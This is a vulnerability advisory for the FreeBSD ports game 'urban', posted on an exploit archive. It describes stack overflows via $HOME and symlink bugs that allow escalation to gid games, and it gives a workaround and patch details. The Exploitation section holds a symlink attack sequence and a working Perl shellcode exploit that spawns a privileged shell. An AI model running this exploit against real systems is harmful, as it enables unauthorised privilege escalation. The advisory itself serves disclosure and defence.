what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

urbanGame.txt

urbanGame.txt
Posted Sep 7, 2005
Authored by Shaun Colley

Urban 1.5.3_1, part of the FreeBSD ports collection, is vulnerable to a stack overflow when handling the $HOME environmental variable. Since urban is installed with setgid games privileges, privilege escalation is possible. Earlier versions may also be susceptible. Proof of concept exploit included.

tags | exploit, overflow, proof of concept
systems | freebsd
SHA-256 | b4fa91cfa2c177e64461bac4e36029a755502d986f5de31f6bfe695b11b11cb7

urbanGame.txt

Change Mirror Download
Multiple vulnerabilities in FreeBSD 'urban'

September 4th, 2005

I. BACKGROUND

URBAN is a bloody, violent sidescrolling shoot-em-up in which you're a
renegade military cyborg fighting your way out of the military base
where you were created.

'urban' is maintained and distributed as a FreeBSD ports package, as well
as having its own developer and official tarball release. The FreeBSD
ports package is installed setgid games by default, to allow for global
score files. Urban is vulnerable to several stack overflow and symlink
vulnerabilities, giving rise to the possibility of privilege escalation to
gid games.

[* urban's official release, available at <https://urban.bengburken.net>,
does *not* install urban with setgid games privileges by default, so only
the FreeBSD ports package is susceptable to the vulnerabilities later
outlined in this advisory *]

II. DESCRIPTION

Urban is vulnerable to a stack overflow when handling the $HOME
environmental variable. Since urban is installed with setgid games
privileges, privilege escalation is possible. The overflow occurs when
urban copies the contents of the user's $HOME environmental variable into
a fixed-length buffer without bounds checking (sprintf is used).

[ ... ]

sprintf(filename, "%s/.urban", getenv("HOME"));

[ ... ]

sprintf(filename, "%s/.urban/savegame.dat", getenv("HOME"));

[ ... ]

Several other less likely stack overflows may occur, such as in the
copying of the $USER environmental variable in certain circumstances.

[ ... ]

if(getenv("USER") != NULL)
strcpy(Name, getenv("USER"));

[ ... ]

Urban is also vulnerable to some less serious symlink bugs, due to the
following of symbolic links when creating certain high score and save game
files.

[ ... ]

/* Create dir */
sprintf(filename, "%s/.urban", getenv("HOME"));

[ ... ]

mkdir(filename, S_IRUSR | S_IWUSR | S_IXUSR);

sprintf(filename, "%s/.urban/savegame.dat", getenv("HOME"));

if((fs = fopen(filename, "wb")) == NULL)

[ ... ]

Since urban has the setgid games privileges, an attacker can craft an
appropriate symbolic link (i.e. ~/.urban/savegame.dat) which can lead to
creation and/or truncation of files with the privileges of gid games.
This may allow attackers to edit global score files and possibly leverage
further attacks (i.e. exploit symlink bugs in games which require
write-access to /var/games to exploit).

It is worth noting once more that the official tarball of urban does *not*
install urban with setgid games privileges, but the FreeBSD ports version
does (/usr/ports/games/urban).



III. EXPLOITATION

The symbolic link bug outlined earlier can be exploited by creating a
suitable symbolic link in one's home directory, such as
~/.urban/savegame.dat.

bash-2.05b# ls -l /var/games/helloworld
ls: /var/games/helloworld: No such file or directory
bash-2.05b# ln -s /var/games/helloworld savegame.dat
bash-2.05b# ls -l
total 0
lrwxr-xr-x 1 root wheel 21 Sep 4 16:17 savegame.dat ->
/var/games/helloworld
bash-2.05b# urban
[ output truncated ]
bash-2.05b# ls -l /var/games/helloworld
-rw-r--r-- 1 root games 0 Sep 4 16:17 /var/games/helloworld

It is possible to write to any file writable by group games. Such may
allow editing of score files and the possibility of further privilege
escalation (i.e. exploitation of bugs which require access to score file
dirs).

The stack overflow in handling of the user's $HOME environmental variable
is exploitable as a vanilla buffer overflow.

su-2.05b$ export HOME=`perl -e 'print "a"x2000'`
su-2.05b$ gdb -q urban
(no debugging symbols found)...(gdb) r
Starting program: /usr/X11R6/bin/urban

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 1 (LWP 100144)]
0x61616161 in ?? ()
(gdb)

Exploitation is straight forward.

I have written a simple exploit which yields a shell with egid (effective
group id) privileges.

-- urban.pl
#!/usr/bin/perl
# FreeBSD /usr/ports/games/urban local stack overflow exploit
# 'urban' is vulnerable to a stack overflow when handling
# the $HOME environmental variable, thus allowing privilege
# escalation to gid games since 'urban' is setgid 'games'.
# Shellcode and NOPs are placed inside an environmental variable
# ($HACK) and $HOME is crafted such that 'urban' will return into
# the code in $HACK. The address of $HACK in the environment may
# need some investigating (i.e. using gdb).
#
# shaun@213$ id
# uid=1003(shaun) gid=1004(shaun) groups=1004(shaun)
# shaun@213$ perl urban.pl
# $ id
# uid=1003(shaun) gid=1004(shaun) egid=13(games) groups=13(games),
1004(shaun)
# $

$ret = 0xbfbfeece; #works on my FreeBSD 5.4-RELEASE system
$nop = "\x90";
$shellcode =
"\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89\x36\x89\x76\x04\x89\x76\x08\x83\x06\x10\x83\x46\x04\x18\x83\x46\x08\x1b\x89\x46\x0c\x88\x46\x17\x88\x46\x1a\x88\x46\x1d\x50\x56\xff\x36\xb0\x3b\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\xff\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02/bin/sh.-c.sh";

for($i = 0; $i < 100; $i++) {
$buffer .= $nop;
}
$buffer .= $shellcode;
local($ENV{'HACK'}) = $buffer;

$ret = pack("l", $ret);
local($ENV{'HOME'}) = "a"x1036 . $ret;
exec("urban"); # run vulnerable program
-- urban.pl

Also available at: <http://www.demodulated.net/exploits/urban.pl>

Below shows output of me running the exploit.

su-2.05b$ id
uid=1002(shaun) gid=1002(shaun) groups=1002(shaun)
su-2.05b$ perl urban.pl
$ id
uid=1002(shaun) gid=1002(shaun) egid=13(games) groups=13(games), 1002(shaun)



IV. DETECTION

The latest FreeBSD ports release of urban is vulnerable.

urban 1.5.3_1

Earlier versions are suspected vulnerable.

The latest official release of urban, 1.5.3, contains all the bugs
aforementioned, but does not install urban with setgid games privileges.


V. WORKAROUND

Remove setgid games privileges from the urban binary.

bash-2.05b# ls -l `which urban`
-r-xr-sr-x 1 root games 340224 Sep 4 16:17 /usr/X11R6/bin/urban
bash-2.05b# chmod g-s `which urban`
bash-2.05b# ls -l `which urban`
-r-xr-xr-x 1 root games 340224 Sep 4 16:17 /usr/X11R6/bin/urban

This will render global scoring unusable unless urban is run as root or
games user.


VI. SOLUTION

I submitted information and patches to the FreeBSD ports urban maintainer,
Jean-Yves Lefort, and he reports that the patches have been committed for
later release. The unified patch file can be obtained from my webspace,
<http://www.demodulated.net/urban-overflows.patch>.

The patch fixes the overflows mentioned earlier, and several other
possible overflows. Privileges are also dropped at the beginning of
execution and restored when needed.



Thanks to Jean-Yves Lefort for cooperation.


Thank you for your time,
Shaun.


Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    14 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close